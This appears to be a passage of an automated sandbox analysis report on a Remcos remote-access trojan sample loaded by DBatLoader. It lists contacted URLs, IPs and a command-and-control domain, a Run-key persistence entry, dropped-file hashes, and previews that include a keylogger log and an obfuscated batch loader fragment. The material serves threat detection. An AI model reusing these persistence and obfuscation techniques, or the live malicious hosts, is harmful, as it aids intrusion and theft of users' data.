                          https://maan2u.com/doc/233_Qzzgbhhaamltrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://geoplugin.net/json.gp(colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://sectigo.com/CPS0XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://geoplugin.net/json.gpl#colorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ocsp.sectigo.com0XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://geoplugin.net/json.gp/CXjPA2pnUhC.exe, 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://geoplugin.net/json.gpJcolorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://geoplugin.net/json.gpWcolorcpl.exe, 00000007.00000003.2139804062.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://maan2u.com:443/doc/233_QzzgbhhaamlXjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://maan2u.com/XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000623000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.pmail.comXjPA2pnUhC.exe, XjPA2pnUhC.exe, 00000000.00000002.2130796963.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://geoplugin.net/json.gpSystem32colorcpl.exe, 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ocsp.sectigo.com0CXjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          112.137.173.77
                          		maan2u.comMalaysia
                          		17971TMVADS-APTM-VADSDCHostingMYtrue
                          178.237.33.50
                          		geoplugin.netNetherlands
                          		8455ATOM86-ASATOM86NLfalse
                          192.161.184.44
                          		apostlejob2.duckdns.orgUnited States
                          		8100ASN-QUADRANET-GLOBALUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1517948
                          Start date and time:2024-09-25 09:33:43 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 10m 14s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:14
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:XjPA2pnUhC.exe
                          renamed because original name is a hash value
                          Original Sample Name:bbf710c83246092a538128620853d4fd.exe
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@18/10@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 86
                          • Number of non-executed functions: 215
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: XjPA2pnUhC.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          03:34:33API Interceptor2x Sleep call for process: XjPA2pnUhC.exe modified
                          03:34:51API Interceptor2x Sleep call for process: Qzzgbhha.PIF modified
                          03:35:13API Interceptor6841924x Sleep call for process: colorcpl.exe modified
                          09:34:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha C:\Users\Public\Qzzgbhha.url
                          09:34:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha C:\Users\Public\Qzzgbhha.url

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          112.137.173.77Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                            EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                              ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                178.237.33.50C8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                • geoplugin.net/json.gp
                                RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                • geoplugin.net/json.gp
                                xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • geoplugin.net/json.gp
                                GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                • geoplugin.net/json.gp
                                TT4729920DBO.xlsGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                • geoplugin.net/json.gp
                                UsoOuMVYCv8QrxG.exeGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                • geoplugin.net/json.gp
                                Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • geoplugin.net/json.gp
                                SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exeGet hashmaliciousRemcosBrowse
                                • geoplugin.net/json.gp
                                192.161.184.44ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  maan2u.comPayment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                  • 112.137.173.77
                                  EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                  • 112.137.173.77
                                  ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • 112.137.173.77
                                  apostlejob2.duckdns.orgZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • 192.161.184.44
                                  1715671566ff29b1c279c8e66099d383a7e1b960729a091c6d4225ded86182badee2c75ba9889.dat-decoded.exeGet hashmaliciousAveMaria, UACMeBrowse
                                  • 107.175.212.20
                                  geoplugin.netC8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                  • 178.237.33.50
                                  RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  TT4729920DBO.xlsGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 178.237.33.50
                                  UsoOuMVYCv8QrxG.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 178.237.33.50
                                  Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ASN-QUADRANET-GLOBALUSBANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                  • 66.63.187.123
                                  https://2836500.vip/Get hashmaliciousUnknownBrowse
                                  • 27.0.235.55
                                  #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                  • 45.95.233.246
                                  #U0631#U0648#U0632 #U0633#U06cc#U0627#U0647 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                  • 45.95.233.246
                                  #U0641#U0631#U0627#U062e#U0648#U0627#U0646 #U0631#U0648#U0632 #U06a9#U0627#U0631#U06af#U0631.exeGet hashmaliciousUnknownBrowse
                                  • 45.95.233.246
                                  Drawing_Products_Materials_and_Samples_IMG.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                  • 64.188.18.75
                                  11062370MXQRQ353000718_001.docGet hashmaliciousUnknownBrowse
                                  • 66.63.187.123
                                  http://closingdocuments.z13.web.core.windows.net/Get hashmaliciousHTMLPhisherBrowse
                                  • 104.194.214.213
                                  swift.docGet hashmaliciousNanocoreBrowse
                                  • 66.63.187.123
                                  ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • 192.161.184.44
                                  ATOM86-ASATOM86NLC8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                  • 178.237.33.50
                                  RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  TT4729920DBO.xlsGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 178.237.33.50
                                  UsoOuMVYCv8QrxG.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                  • 178.237.33.50
                                  Awb_Shipping_Documents_BL_Invoice_Packinglist_0000000000000000000000pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 178.237.33.50
                                  SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exeGet hashmaliciousRemcosBrowse
                                  • 178.237.33.50
                                  TMVADS-APTM-VADSDCHostingMYPayment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                  • 112.137.173.77
                                  EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                  • 112.137.173.77
                                  ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • 112.137.173.77
                                  arm6.elfGet hashmaliciousUnknownBrowse
                                  • 202.75.62.110
                                  SecuriteInfo.com.Trojan.AutoIt.1161.27360.18045.exeGet hashmaliciousVIP KeyloggerBrowse
                                  • 202.75.41.110
                                  M2Vf6ASl3g.elfGet hashmaliciousUnknownBrowse
                                  • 202.75.62.171
                                  fhSHwOyb33.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  • 202.75.62.139
                                  sora.arm7.elfGet hashmaliciousMiraiBrowse
                                  • 202.75.62.119
                                  lB9ZXOQaP3.elfGet hashmaliciousMiraiBrowse
                                  • 202.75.62.116
                                  ngbwBT18rP.elfGet hashmaliciousMiraiBrowse
                                  • 202.75.62.121

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  a0e9f5d64349fb13191bc781f81f42e1ACeTKO93e9.exeGet hashmaliciousLummaCBrowse
                                  • 112.137.173.77
                                  LNGHLELNes.exeGet hashmaliciousLummaCBrowse
                                  • 112.137.173.77
                                  NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                  • 112.137.173.77
                                  Document.xlsGet hashmaliciousUnknownBrowse
                                  • 112.137.173.77
                                  L24027490-Modello incendio e altri rami [NEW](Elaborato finale)-23092024.xlsGet hashmaliciousUnknownBrowse
                                  • 112.137.173.77
                                  YPDi0gRMHU.exeGet hashmaliciousSmokeLoaderBrowse
                                  • 112.137.173.77
                                  CNpQfI8eIT.exeGet hashmaliciousSmokeLoaderBrowse
                                  • 112.137.173.77
                                  4EtLXn5pqI.exeGet hashmaliciousSmokeLoaderBrowse
                                  • 112.137.173.77
                                  RWcyVDbMGQ.exeGet hashmaliciousSmokeLoaderBrowse
                                  • 112.137.173.77
                                  http://juno-online7373h.wixsite.com/my-site/Get hashmaliciousUnknownBrowse
                                  • 112.137.173.77

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\Public\Libraries\Qzzgbhha.PIFPayment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                    C:\Users\Public\alpha.pifORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                      ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                          Contact Form and Delivery Details ,pdf.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                            Duclot Collections.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                              GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                                  Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                                    Confirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                      IEry29c3sb.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                                                        Created / dropped Files

                                                        C:\ProgramData\remcos\logs.dat

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\colorcpl.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):288
                                                        Entropy (8bit):3.3169194756385068
                                                        Encrypted:false
                                                        SSDEEP:6:6l2855YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lfec0WFe5BWFe5BW+
                                                        MD5:D8D18E38339CE67F1E76B9D7BE7587C9
                                                        SHA1:8298AF9BCF75AE2BC785845DE1EB7D2C9587B019
                                                        SHA-256:CA9401BD555D9C499934B414B7DDBBDD28A2AC94937B95749688E7EA940AA9DE
                                                        SHA-512:72547AD9788A60C201DD3B931301074D8501D96C0A92C12E983770055B41CC14B12BB033F5CE4F6C74F22D0F09B5941189C911CADC4413CA7146D7AA8B1786F4
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                        Preview:....[.2.0.2.4./.0.9./.2.5. .0.3.:.3.4.:.4.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                        C:\Users\Public\Libraries\PNO

                                                        Download File
                                                        Process:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4
                                                        Entropy (8bit):2.0
                                                        Encrypted:false
                                                        SSDEEP:3:gov:gov
                                                        MD5:D17B8377F66273771CD3B5165F393561
                                                        SHA1:4218581488233698A293E3BF395DEA242601910A
                                                        SHA-256:BAD8A8C24E18664287F4F20CB8DE2B089525D51F939C537B471F2D273FB66F3F
                                                        SHA-512:38C9C49E34D4057CC084BABB9791E603F81AB0CB64E1973896C3615CD18B09B26E2375EE273B7D7180DE98A9369F71A63783E55CC1C854BF7B08939E82DE85DB
                                                        Malicious:false
                                                        Preview:76..

                                                        C:\Users\Public\Libraries\Qzzgbhha

                                                        Download File
                                                        Process:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):838459
                                                        Entropy (8bit):7.206470842924749
                                                        Encrypted:false
                                                        SSDEEP:12288:cd6lycsEh2/Qd72Q9q7UKotuTJ/4hppo5lc06HxNnrpEGOFz9cWVAfGWYHW8:k6lycs4Nd7Azo41uppOOhIFBe+Z
                                                        MD5:E9303B0472758478C2F6287D39F73614
                                                        SHA1:FAD32F4636A60969F0C9C3B1CA8D1A0AB5C9D37D
                                                        SHA-256:4224050F7B373F1F8D35D736741DCE705F12058F2BCDDA8FAB9D95969D3722FF
                                                        SHA-512:3237492F2A486E0E2CCE18DBAAA16798039C967C34AB60162A37F010E96588EFF58549361AACD08FB80FF13DC8DF8212AA45C89A012B69349F23CF5CC0CBD5FD
                                                        Malicious:true
                                                        Preview:...Y#..K#%'...#....."'.......!............ !'....% .........%... $$.%.'..'.'%$..&&....Y#..K.''...........Y#..K..........}..7:0..v..........7G...0..<..A.....'..`L.:.......N.....{*...5I>....KI.:.L={.79..V7...q..%X....*..0.6.d5e...z&.....lX.js..7./..8.,...........@.*O... Zw......512..7......z+...U,1.m..X.. X.0B--E5..rH........].......%B6...#..y..K...Sf.....3.......Q..W.W..rL......)O..4...=.........R9.......#)N5..DF........L73E...5.O2y.8^.nX.N.v...".lm..........mP..._~..`R,.C.........K....2...R..{Q.W.z....O:>.54....Q...Z...X..V9B...5.2s...1...WF4.N....2...XJ...QJ.R...S.8.O.BH.....<:14....Y.....uGd.....H.r......._....L....(E...;...=.UF.46....5.?.z.?W E..'.....9....O=33..+.....1BCH....Y|.R..U.b#w.k..P.v+.S..V..I..........O...........O'..........'.../....2:..CU/.-.1..a.h.4.<.H..v.........M.M..../7.. ...p-.H../....q...j..."k...Wd.5.>5..*.=.&`i.........cJ..........%....N(..1...O.n....K..............U..,.....!....3..N.o......1.........H....

                                                        C:\Users\Public\Libraries\Qzzgbhha.PIF

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1088512
                                                        Entropy (8bit):6.864877848429584
                                                        Encrypted:false
                                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                                        MD5:BBF710C83246092A538128620853D4FD
                                                        SHA1:95338F06C76178DE31B5E8453F92C43F970EA9F9
                                                        SHA-256:7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                                                        SHA-512:A609D92FE0D25E7DB140C731AF4B241D47CDADDFE735D9F7575C982EF790AB01D7F969038546E6054101B745E8C208F74E41FAF246173CA0722C7B994CF94001
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                        Joe Sandbox View:
                                                        • Filename: Payment Slip.xls, Detection: malicious, Browse
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................2...f......$H.......P....@..........................0...................@...............................(...p..........................Pl......................................................H............................text....'.......(.................. ..`.itext..l....@.......,.............. ..`.data........P.......6..............@....bss.....6...p.......J...................idata...(.......*...J..............@....tls....4............t...................rdata...............t..............@..@.reloc..Pl.......n...v..............@..B.rsrc........p......................@..@.............0......................@..@................................................................................................

                                                        C:\Users\Public\Libraries\ahhbgzzQ.cmd

                                                        Download File
                                                        Process:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):62357
                                                        Entropy (8bit):4.705712327109906
                                                        Encrypted:false
                                                        SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                        MD5:B87F096CBC25570329E2BB59FEE57580
                                                        SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                        SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                        SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                        Malicious:false
                                                        Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                        C:\Users\Public\Qzzgbhha.url

                                                        Download File
                                                        Process:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF">), ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):104
                                                        Entropy (8bit):5.160488007387044
                                                        Encrypted:false
                                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMskWTsbxK2tKuAu:HRYFVmTWDyzZkWTExKKKPu
                                                        MD5:FDFB411C003350B3E521F33300137544
                                                        SHA1:D23909681FEE8C5AEF928265EB9932336AB32A4C
                                                        SHA-256:44D149A12ED89AB4CA77F1952646B75770BF67E928E9D172D56D374672126B20
                                                        SHA-512:D3888B3485A224B87FA47B7C77E78512A65AA6738046A9AD17314FD6D910BBF69C44E8F9165CFEDF9D4DD49CBBFA2D86BC7321CBEE70D39E527A855E86F9EB68
                                                        Malicious:true
                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF"..IconIndex=916994..HotKey=33..

                                                        C:\Users\Public\alpha.pif

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):236544
                                                        Entropy (8bit):6.4416694948877025
                                                        Encrypted:false
                                                        SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                        MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                        SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                        SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd, Detection: malicious, Browse
                                                        • Filename: ZPujMIT7Vs.exe, Detection: malicious, Browse
                                                        • Filename: ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd, Detection: malicious, Browse
                                                        • Filename: Contact Form and Delivery Details ,pdf.cmd, Detection: malicious, Browse
                                                        • Filename: Duclot Collections.bat, Detection: malicious, Browse
                                                        • Filename: GestionPagoAProveedores_100920241725998901306_PDF.cmd, Detection: malicious, Browse
                                                        • Filename: 241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd, Detection: malicious, Browse
                                                        • Filename: Julcbozqsvtzlo.cmd, Detection: malicious, Browse
                                                        • Filename: Confirmation.docx.exe, Detection: malicious, Browse
                                                        • Filename: IEry29c3sb.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                        Download File
